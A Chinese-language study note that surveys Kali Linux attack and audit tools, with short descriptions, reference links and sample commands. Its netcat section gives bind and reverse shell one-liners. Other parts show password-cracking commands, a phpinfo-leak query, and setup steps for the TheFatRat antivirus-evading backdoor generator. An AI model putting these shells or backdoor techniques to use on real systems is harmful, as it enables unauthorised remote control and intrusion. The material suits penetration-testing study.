kali工具整理

信息收集

Maltego

Maltego社会工程学信息收集工具。作为一款成功的信息收集工具其功能强大，它不仅可以自动收集到所需信息，而且可以将收集的信息可视化，用一种图像化的方式将结果呈现给我们。

参考：http://www.360doc.com/content/18/0725/01/11935121_772997434.shtml

https://www.freebuf.com/sectool/187831.html

Netdiscover

Netdiscover是一个主动/被动的ARP侦查工具。该工具在不使用DHCP的无线网络上非常有用。使用Netdiscover工具可以在网络上扫描IP地址。

参考：https://blog.csdn.net/daxueba/article/details/42706131

DMitry

是一个一体化的信息收集工具。根据IP（或域名）来查询目标主机的Whois信息
在Netcraft.com的网站上挖掘主机信息
查找目标域中用的子域
查找目标域的电子邮件地址
探测目标主机上打开的端口、被屏蔽的端口和关闭的端口

参考：https://blog.csdn.net/tianjin_ren/article/details/91178090

ike-scan

现在的VPN网络都是基于IPsec技术搭建的。这类VPN默认使用UDP协议，端口为500。由于不监听TCP端口，所以无法被TCP扫描发现。同时，它不会发送ICMP无法抵达包，所以也不会被UDP端口扫描所发现。由于IPsec规定，服务不会对错误格式包响应，所以即使使用UDP协议，向端口500发送垃圾数据，也不会探测到VPN服务。
要想判断VPN服务，必须遵循IPsec技术规范，发送正确格式的包，才能嗅探服务器是否存在VPN服务。Kali Linux提供了ike-scan工具。该工具功能强大，不仅支持IPsec VPN的两种工作连接模式，进行指纹识别，还可以伪造各种不规范包，以获取更多的信息。

参考：https://blog.csdn.net/tianjin_ren/article/details/91188222

https://www.jianshu.com/p/f6149a72f8a7?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation

unix-privesc-check

Kali Linux自带的一款提权漏洞检测工具。它是一个Shell文件，可以检测所在系统的错误配置，以发现可以用于提权的漏洞。该工具适用于安全审计、渗透测试和系统维护等场景。它可以检测与权限相关的各类文件的读写权限，如认证相关文件、重要配置文件、交换区文件、cron job文件、设备文件、其他用户的家目录、正在执行的文件等等。如果发现可以利用的漏洞，就会给出提示warning。

unix-privesc-check并不会检测所有提权漏洞的潜在情况。它只是快速进行检测，并以简洁的方式给出提权漏洞相关的建议，大大减少用户在文件权限检测方面的枯燥工作的量。

（1）将unix-privesc-check上传到目标主机上，或者直接在本机上。

（2）执行以下命令，进行漏洞检测。

unix-privesc-check standard

Commix 命令注入工具

命令注入（Command Injection）攻击是针对Web应用的一种攻击方式。很多Web应用会读取用户提交的数据，然后传递到系统Shell，执行特定的操作，如为用户创建单独的目录或文件、搜索特定的文件。如果对用户提交的数据缺少严格的验证，就会造成命令注入漏洞。

Kali Linux提供针对该漏洞的专向工具Commix。该工具支持Results-Base和Blind两类注入方式。它以命令行方式运行。它会自动攻击漏洞，枚举目标主机信息，并允许用户上传恶意文件，达到控制主机的目的。

参考：https://blog.csdn.net/freegotocpp/article/details/83273769

漏洞扫描器

nikto

一款功能强大的 Web 服务器扫描程序 —— 这使其成为最好的 Kali Linux 工具之一。 它会检查存在潜在危险的文件/程序、过时的服务器版本等等。

nikto -h 10.10.10.146  -evasion 12345

参考：https://www.cnblogs.com/WYQ-grasslands/archive/2018/04/15/8850144.html

phpinfo：域名+?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 会爆出phpinfo信息

dotdotpwn

dotdotpwn -m http -O -s  -h 10.10.10.146

只能80端口，没改端口的参数，比较鸡肋

参考：https://blog.csdn.net/SHIGUANGTUJING/article/details/88959824

Sparta（斯巴达）–信息收集扫描爆破集成

参考：https://www.jianshu.com/p/81be445b7c5d

Sparta是一个Nmap、Nikto、Hydra等工具的集合，利用各个工具的优秀功能，完成信息收集、扫描和爆破等一体化的工具流。图形界面，kali自带，主机扫描。

WPScan（针对WordPress ）

WordPress 是最好的开源 CMS之一，而这个工具是最好的免费 WordpPress 安全审计工具。它是免费的，但不是开源的。如果你想知道一个 WordPress 博客是否在某种程度上容易受到攻击，WPScan 就是你的朋友。此外，它还为你提供了所用的插件的详细信息。当然，一个安全性很好的博客可能不会暴露给你很多细节，但它仍然是 WordPress 安全扫描找到潜在漏洞的最佳工具。

websploit

自动化渗透神器websploit

参考https://blog.csdn.net/m0_37438418/article/details/78979792

数据库

hexorbase

HexorBase是一个数据库应用。它是为从一个集中的位置同时管理和审计多个数据库服务器而被设计出来的。它能够执行SQL查询和对常见的数据库服务器暴力破解攻击（MySQL和SQLite的，微软SQL服务器，甲骨文和PostgreSQL）.HexorBase允许通过代理进行数据包路由甚至以Metasploit为核心进行路由从而去和隐藏在本地子网内的远程服务器进行通信。
参考：https://blog.csdn.net/qq_29277155/article/details/51759555

sql注入

sqlmap

JSQL-自动化SQL注入神器

jSQL injection是一款由JAVA开法的SQL自动化注入工具，它提供了数据库查询、后台爆破、文件读取、Web shell、SQL Shell、文件上传、暴力枚举、编码、批量注入测试等强大的功能，是一款非常不错的工具，也是渗透测试人员的强大助手。它支持GET\POST注入，同时也可以进行HTTP头注入（这个需要用户自动构建）

参考：https://blog.csdn.net/Fly_hps/article/details/80614814

Skipfish

Skipfish 是一个 Web 应用扫描程序，可以为你提供几乎所有类型的 Web 应用程序的洞察信息。它快速且易于使用。此外，它的递归爬取方法使它更好用。Skipfish 生成的报告可以用于专业的 Web 应用程序安全评估。

skipfish -o test http:1.1.1.1   #指定输出目录/路径 输出到test目录

参考：https://blog.csdn.net/zixuanfy/article/details/52783889

端口扫描

nmap

netcat

netcat被称作是网络工具当中的瑞士军刀,短小却功能强大

参考：https://www.cnblogs.com/nul1/p/10992279.html

端口扫描：nc -nvz 192.168.1.105 1-65535

远程控制

正向
A:
nc -lp 端口 -c bash
B:
nc -nv A的IP 端口

eg:

A:
nc -lp 3333 -c bash
B:
nc -nv 192.168.1.104 3333
反向
A:
nc -lp 端口
B:
nc -nv A的IP 端口 -c bash

A:
nc -lp 3333
B:
nc -nv 192.168.1.104 3333 -c bash

-c是使用命令行,如果是Windows主机,需要把bash改成cmd

正向是A被控制,反向是B被控制

密码破解

hydra

hydra在线破解工具，参考：https://www.cnblogs.com/ECJTUACM-873284962/p/7805116.html

John the Ripper

离线破解工具

John the Ripper是一个快速的密码破解工具，用于在已知密文的情况下尝试破解出明文，支持目前大多数的加密算法，如DES、MD4、MD5等。它支持多种不同类型的系统架构，包括Unix、Linux、Windows、DOS模式、BeOS和OpenVMS，主要目的是破解不够牢固的Unix/Linux系统密码。除了在各种Unix系统上最常见的几种密码哈希类型之外，它还支持Windows LM散列，以及社区增强版本中的许多其他哈希和密码。它是一款开源软件。Kali中自带JohnLinux下的使用方法：

john –wordlist=passwd.dic shadow.txt

WIFI

参考：https://www.freebuf.com/sectool/137163.html

Aircrack-ng

Aircrack-ng 是评估 WiFi 网络安全性的工具集合。它不仅限于监控和获取信息 —— 还包括破坏网络（WEP、WPA 1 和 WPA 2）的能力。

如果你忘记了自己的 WiFi 网络的密码，可以尝试使用它来重新获得访问权限。它还包括各种无线攻击能力，你可以使用它们来定位和监控 WiFi 网络以增强其安全性。

XSS

BeEF

BeEF（浏览器利用框架Browser Exploitation Framework）是另一个令人印象深刻的工具。它专为渗透测试人员量身定制，用于评估 Web 浏览器的安全性。

这是最好的 Kali Linux 工具之一，因为很多用户在谈论 Web 安全时希望了解并修复客户端的问题。

逆向

Apktool

Apktool 确实是 Kali Linux 上用于逆向工程 Android 应用程序的流行工具之一

数字取证

Autopsy Forensic Browser

Autopsy 是一个数字取证工具，用于调查计算机上发生的事情。那么，你也可以使用它从 SD 卡恢复图像。它也被执法官员使用。你可以阅读文档来探索可以用它做什么。你还应该查看他们的 GitHub 页面。

钓鱼

King Phisher

网络钓鱼攻击现在非常普遍。King Phisher 工具可以通过模拟真实的网络钓鱼攻击来帮助测试和提升用户意识。出于显而易见的原因，在模拟一个组织的服务器内容前，你需要获得许可。

免杀

TheFatRat

参考：https://www.cnblogs.com/dr228912353/p/9170443.html

一、安装方法

git clone https://github.com/Screetsec/TheFatRat.git

cd Fatrat

apt-get update

apt-get install mingw32 backdoor-factory

echo ‘deb http://http.kali.org/kali sana main non-free contrib’ >> /etc/apt/sources.list

apt-get update

apt-get install mingw32

安装完之后，我们要给下面2个文件赋予下权限。

​ chmod +x fatrat

chmod +x powerfull.sh

./fatrat

二、使用方法

下面是主界面的功能截图，顺便说下软件的logo太个性了。作者一定很喜欢老鼠。

建议大家使用第二个生成后门的模块，这个缺点就是生成后门的速度真的跟蜗牛一样，但是免杀效果是最好的。